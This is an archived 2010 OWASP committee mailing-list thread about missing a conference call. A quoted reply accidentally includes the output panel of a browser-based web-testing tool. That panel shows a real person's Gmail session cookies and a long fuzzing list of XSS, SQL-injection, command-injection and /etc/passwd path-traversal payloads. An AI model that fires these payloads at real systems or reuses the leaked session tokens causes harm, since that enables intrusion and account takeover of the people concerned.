[OCC] Probably not going to make tonight's call

Jim Manico jim.manico at owasp.org
Tue Apr 20 14:53:29 EDT 2010


I am very sorry, I can not be on the call today.

But if there is any OWASP news - please let me know - and I'll add it to 
the next podcast.

Cheers!
- Jim

> I am stuck in amsterdam but I hope to do the call.
> Can you resent me the number & password.
>
>
> On 20 April 2010 13:55, Justin Clarke <justin.clarke at owasp.org 
> <mailto:justin.clarke at owasp.org>> wrote:
>
>     as I will be (finally!) heading back to the UK (fingers crossed my
>     train isn't cancelled)
>
>     Justin
>
>     _______________________________________________
>     Owasp-connections-committee mailing list
>     Owasp-connections-committee at lists.owasp.org
>     <mailto:Owasp-connections-committee at lists.owasp.org>
>     https://lists.owasp.org/mailman/listinfo/owasp-connections-committee
>
>
>
>
> -- 
> Eoin Keary
> OWASP Global Board Member
> OWASP Code Review Guide Lead Author
>
> http://asg.ie/
> https://twitter.com/EoinKeary
>
>
>       YEHG.Net Greasemonkey Web Page Fingerprinter [x]
>
>
>
> *[URL]*
>
> http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy 
> <http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy>
>
> *[Headers]*
>
> Server: GSE 
> <http://www.scroogle.org/cgi-bin/nbbw.cgi?Gw=GSE%20vulnerabilities>
>
> Cache-Control: no-cache, no-store, max-age=0, must-revalidate
> Pragma: no-cache
> Expires: Fri, 01 Jan 1990 00:00:00 GMT
> Date: Tue, 20 Apr 2010 13:23:41 GMT
> refresh: 0;URL=http://mail.google.com/mail/
> Content-Type  <http://mail.google.com/mail/Content-Type>: text/html; charset=UTF-8
> Content-Length: 141
> X-Content-Type-Options: nosniff
> X-Frame-Options: SAMEORIGIN
> X-XSS-Protection: 1; mode=block
>    
> Content-length: 152
> Cookie: S=gmail=PciTTJPGMgHdBzX4ZDmmaQ:gmproxy=_32NSy9ve-BPVcDoCLo_aw; 
> GMAIL_AT=xn3j2txzkcx0v0du4lyc2mdlrv8y5y; 
> gmailchat=eoinkeary at gmail.com/74130 
> <http://[email protected]/74130>; 
> PREF=ID=87323db52d21270b:U=108181914cb40a2c:TM=1259168113:LM=1270559278:GM=1:S=aas1oh9EOxR-9Hhg; 
> TZ=-60; 
> SID=DQAAAIQAAAD4hIScE7EFS7ZiRsML-bc1RVq52Zu6VCLhmUpMdpiNAzMhvY4ki7XYcFgLdg-v3LydkH3Gnzo5c9-AySMALMpnPyCnieZ8kMkGSLvbfP22WpvYKy6PqXKbqrP5J2NsJXfRUj8Af1E9LrGPFCZyDXefM2MEMSh60keWLHA6HQMsf8REaGp388kkcB-8Zcocvgg
>   => Edit Cookie
>
> *[RECON]*
>
> WebhostinfoDNSStuffRobtexDNSNetwork 
> DNSRecordsDomainToolsSamSpadeHost2IPNetcraft WhatSiteNetcraft 
> SiteReportNetwork TracertNetwork LookupNetwork WhoisBetterwhoisNetwork 
> ExpressPortScan1PortScan2FlashPortScanMX ProfileMX LookupMX 
> RecordsdirIndexingcache:link:site:emailfile:pdffile:xlsfile:xmlfile:docfile:pptfile:txtfile:rtffile:conffile:configfile:inifile:lstfile:zipfile:gzipfile:emlfile:psfile:exefile:rpmfile:dbfile:mdbfile:logfile:passwdfile:pwd 
>   [Launch all]   [Prepend Proxy]
>
>
> *[BruteForce Scan]*
>
> Dic-SmallDic-ComprehensiveBigCatalaCommonEuskeraMediumPasslistSpanishSubdomainsUserlistWeak_passwords_module_passlistWeak_passwords_module_userlistCommon_passNamesApacheCgiCgisColdfusionDominoFatwireFatwire_pagenamesFrontpageIisIplanetJrunNetwareOracle9iSharepointSunasTestsTomcatVignetteWeblogicWebsphereo-iiso-cfmo-jsp 
>   [Start]  [View]
>
> Loading ...
>
> Do other stuffs.
> Seem slowly? As it doesn't do multi-requests,
> it's likely that web server IDS may not detect scanning.
> But it's for dictionary scanning only.
>
> [Stat]
>
> Total Form: 0
> Total Link: 2
>
> *[Fuzz URL]*
>
> <a 
> href="http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy">http://mail.google.com/mail/?ui=2&view=bsp&ver=1qygpcgurkovy</a>
>
> Select Fuzz Type:  [Help]
>
>   Fuzz Options Fuzz Db: 1) ---!><!--">xxx<P>yyy..2) "><script>"..3) 
> <script>..</script&gt..4) <<script>..;//<&lt..5) 
> <script>..</script&gt..6) '><script>..<..7) 
> "><script>..;</script&gt..8) \";..;//..9) 
> %3cscript%3e..;%3c/script%3e..10) %3cscript%3e..;%3c%2fscript%3e..11) 
> %3Cscript%3E..;%3C/script%3E..12) &ltscript&gt..;</sc..13) 
> &ltscript&gt..;&lt..14) <xss><script>alert('XSS')&lt..15) 
> <IMG%20SRC='javascript:..16) <IMG SRC="javascript:alert('XSS'..17) 
> <IMG SRC="javascript:alert('XSS'..18) <IMG 
> SRC=javascript:alert('XSS')>..19) <IMG 
> SRC=JaVaScRiPt:alert('XSS')>..20) <IMG 
> SRC=javascript:alert(&quot;XSS&quo..21) <IMG 
> SRC=`javascript:alert("'XSS'..22) <IMG """><SCRIPT>alert(..23) <IMG 
> SRC=javascript:alert(String.fromCharCode(8..24) <IMG%20SRC='javasc 
> ript:..25) <IMG SRC="jav ascript:alert('XSS'..26) <IMG 
> SRC="jav&#x09;ascript:alert('..27) <IMG 
> SRC="jav&#x0A;ascript:alert('..28) <IMG 
> SRC="jav&#x0D;ascript:alert('..29) <IMG SRC=" &#14; 
> javascript:alert(�..30) <IMG DYNSRC="javascript:alert('XSS�..31) <IMG 
> LOWSRC="javascript:alert('XSS�..32) 
> <IMG%20SRC='%26%23x6a;avasc%26%23000010rip..33) <IMG 
> SRC=&#106;&#97;&#118;&#97;..34) <IMG 
> SRC=&#0000106&#0000097&#000011..35) <IMG 
> SRC=&#x6A&#x61&#x76&#x61&a..36) 
> '%3CIFRAME%20SRC=javascript:alert(%2527XSS%25..37) 
> %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A..38) 
> ';alert(String.fromCharCode(88,83,83))//\�..39) 
> '';!--"<XSS>=&{()}..73) `id`..74) `dir`..75) ;id;..76) ;read;..77) 
> ;netstat -a;..78) \nnetstat -a%\n..79) \"blah..80) |id|..81) 
> &quot;;id&quot;..82) id%00..83) id%00|..84) |id..85) |dir..86) 
> |dir|..87) |ls..88) |ls -la..89) ;ls -la..90) ;dir..91) |/bin/ls 
> -al..92) \n/bin/ls -al\n..98) /boot.ini..99) /etc/passwd..100) 
> /etc/shadow..101) 
> ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8...102) 
> ../../../../../../../../../../../../etc/hosts%00..103) 
> ../../../../../../../../../../../../etc/hosts..104) 
> ../../boot.ini..105) /../../../../../../../../%2A..106) 
> ../../../../../../../../../../../../etc/passwd%00..107) 
> ../../../../../../../../../../../../etc/passwd..108) 
> ../../../../../../../../../../../../etc/shadow%00..109) 
> ../../../../../../../../../../../../etc/shadow..110) 
> /../../../../../../../../../../etc/passwd^^..111) 
> /../../../../../../../../../../etc/shadow^^..112) 
> /../../../../../../../../../../etc/passwd..113) 
> /../../../../../../../../../../etc/shadow..114) 
> /./././././././././././etc/passwd..115) 
> /./././././././././././etc/shadow..116) 
> \..\..\..\..\..\..\..\..\..\..\etc\pas..117) 
> \..\..\..\..\..\..\..\..\..\..\etc\sha..118) 
> ..\..\..\..\..\..\..\..\..\..\etc\passw..119) 
> ..\..\..\..\..\..\..\..\..\..\etc\shado..120) 
> /..\../..\../..\../..\../..\../..\../etc/pas..121) 
> /..\../..\../..\../..\../..\../..\../etc/sha..122) 
> .\\./.\\./.\\./.\\./.\\./.\\./etc/pass..123) 
> .\\./.\\./.\\./.\\./.\\./.\\./etc/shad..124) 
> \..\..\..\..\..\..\..\..\..\..\etc\pas..125) 
> \..\..\..\..\..\..\..\..\..\..\etc\sha..126) 
> ..\..\..\..\..\..\..\..\..\..\etc\passw..127) 
> ..\..\..\..\..\..\..\..\..\..\etc\shado..128) 
> %0a/bin/cat%20/etc/passwd..129) %0a/bin/cat%20/etc/shadow..130) 
> %00/etc/passwd%00..131) %00/etc/shadow%00..132) 
> %00../../../../../../etc/passwd..133) 
> %00../../../../../../etc/shadow..134) 
> /../../../../../../../../../../../etc/passwd%00.jp..135) 
> /../../../../../../../../../../../etc/passwd%00.ht..136) 
> /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..137) 
> /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0..138) 
> /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..139) 
> /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..140) 
> %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..141) 
> /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..142) 
> %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..143) 
> %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%2..144) 
> /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%..145) 
> \\&apos;/bin/cat%20/etc/passwd\\&apos;..146) 
> \\&apos;/bin/cat%20/etc/shadow\\&apos;..147) 
> ../../../../../../../../conf/server.xml..148) 
> /../../../../../../../../bin/id|..149) 
> C:/inetpub/wwwroot/global.asa..150) 
> C:\inetpub\wwwroot\global.asa..151) C:/boot.ini..152) 
> C:\boot.ini..153) 
> ../../../../../../../../../../../../localstart.asp..154) 
> ../../../../../../../../../../../../localstart.asp..155) 
> ../../../../../../../../../../../../boot.ini%00..156) 
> ../../../../../../../../../../../../boot.ini..157) 
> /./././././././././././boot.ini..158) 
> /../../../../../../../../../../../boot.ini%00..159) 
> /../../../../../../../../../../../boot.ini..160) 
> /..\../..\../..\../..\../..\../..\../boot.in..161) 
> /.\\./.\\./.\\./.\\./.\\./.\\./boot.in..162) 
> \..\..\..\..\..\..\..\..\..\..\boot.ini..163) 
> ..\..\..\..\..\..\..\..\..\..\boot.ini%0..164) 
> ..\..\..\..\..\..\..\..\..\..\boot.ini..165) 
> /../../../../../../../../../../../boot.ini%00.html..166) 
> /../../../../../../../../../../../boot.ini%00.jpg..167) 
> /.../.../.../.../.../..168) 
> ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%..169) 
> /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/..326) '..327) 
> "..328) #..329) -..330) --..331) ' --..332) --';..333) ' ;..334) = 
> '..335) = ;..336) = --..337) \x23..338) \x27..339) \x3D \x3B'..340) 
> \x3D \x27..341) \x27\x4F\x52 SELECT *..342) \x27\x6F\x72 SELECT 
> *..343) 'or select *..344) admin'--..345) ';shutdown--..346) 
> <>"'%;)(&+..347) ' or ''='..348) ' or 'x'='x..349) " or "x"="x..350) 
> ') or ('x'='x..351) 0 or 1=1..352) ' or 0=0 --..353) " or 0=0 --..354) 
> or 0=0 --..355) ' or 0=0 #..356) " or 0=0 #..357) or 0=0 #..358) ' or 
> 1=1--..359) " or 1=1--..360) ' or '1'='1'--..361) "' or 1 --'"..362) 
> or 1=1--..363) or%201=1..364) or%201=1 --..365) ' or 1=1 or ''='..366) 
> " or 1=1 or ""="..367) ' or a=a--..368) " or "a"="a..369) ') or 
> ('a'='a..370) ") or ("a"="a..371) hi" or "a"="a..372) hi" or 1=1 
> --..373) hi' or 1=1 --..374) hi' or 'a'='a..375) hi') or ('a'='a..376) 
> hi") or ("a"="a..377) 'hi' or 'x'='x';..378) @variable..379) 
> , at variable..380) PRINT..381) PRINT @@variable..382) select..383) 
> insert..384) as..385) or..386) procedure..387) limit..388) order 
> by..389) asc..390) desc..391) delete..392) update..393) distinct..394) 
> having..395) truncate..396) replace..397) like..398) handler..399) 
> bfilename..400) ' or username like '%..401) ' or uname like '%..402) ' 
> or userid like '%..403) ' or uid like '%..404) ' or user like '%..405) 
> exec xp..406) exec sp..407) '; exec master..xp_cmdshell..408) '; exec 
> xp_regread..409) t'exec master..xp_cmdshell 'nslookup www..410) 
> --sp_password..411) \x27UNION SELECT..412) ' UNION SELECT..413) ' 
> UNION ALL SELECT..414) ' or (EXISTS)..415) ' (select top 1..416) 
> '||UTL_HTTP.REQUEST..417) 1;SELECT%20*..418) to_timestamp_tz..419) 
> tz_offset..420) &lt;&gt;&quot;'%;)(&amp;+..421) '%20or%201=1..422) 
> %27%20or%201=1..423) %20$(sleep%2050)..424) %20'sleep%2050'..425) 
> char%4039%41%2b%40SELECT..426) &apos;%20OR..427) 'sqlattempt1..428) 
> (sqlattempt2)..468) test=1..469) test=true..470) test=yes..471) 
> test=y..472) 7357=1..473) 7357=true..474) 7357=yes..475) 7357=y..476) 
> admin=1..477) admin=true..478) admin=yes..479) admin=y..480) 
> adm=1..481) adm=true..482) adm=yes..483) adm=y..484) adm1n=1..485) 
> adm1n=true..486) adm1n=yes..487) adm1n=y..488) access=1..489) 
> access=true..490) access=yes..491) access=y..492) grant=1..493) 
> grant=true..494) grant=yes..495) grant=y..496) debug=1..497) 
> debug=true..498) debug=yes..499) debug=y..500) dbg=1..501) 
> dbg=true..502) dbg=yes..503) dbg=y..504) edit=1..505) edit=true..506) 
> edit=yes..Click here to load   [Insert]  [PCE 
> <javascript:void(0)>]  [HackVertor <javascript:void(0)>]
>
> Launch Window in seconds
>
> If content-length , automatically close Window [Esp. for Debug/Hidden]
>
> If contents do , automatically close Window [Esp. for vulnerability 
> pattern matching]
>
> Fuzz Index From   To
>
> Fuzz Keywords: {XSS} {SQL} {TRA} {CMD} {FUZZ} {DEBUG}
>
>
>
> Best Practice: Block all Ad-related JavaScript sources. Use AddblockPlus!
>
> *[Custom JS Objects]*
>
>
> *[Custom JS Variables]*
>
> =>index  [type=number]  [value=0]
>
> *[Custom JS Functions] Execute <javascript:var cus=prompt("Enter 
> function name","Function name","Function to 
> Execute");if(cus!=null&&cus!=""&&cus!="Function name"){eval(cus);}>*
>
>
>   Job: None
>
>
> _______________________________________________
> Owasp-connections-committee mailing list
> Owasp-connections-committee at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-connections-committee
>    


-- 
Jim Manico
OWASP Podcast Host/Producer
OWASP ESAPI Project Manager
http://www.manico.net

-------------- next part --------------
An HTML attachment was scrubbed...
URL: https://lists.owasp.org/mailman/private/owasp-connections-committee/attachments/20100420/b27d5721/attachment-0001.html 


More information about the Owasp-connections-committee mailing list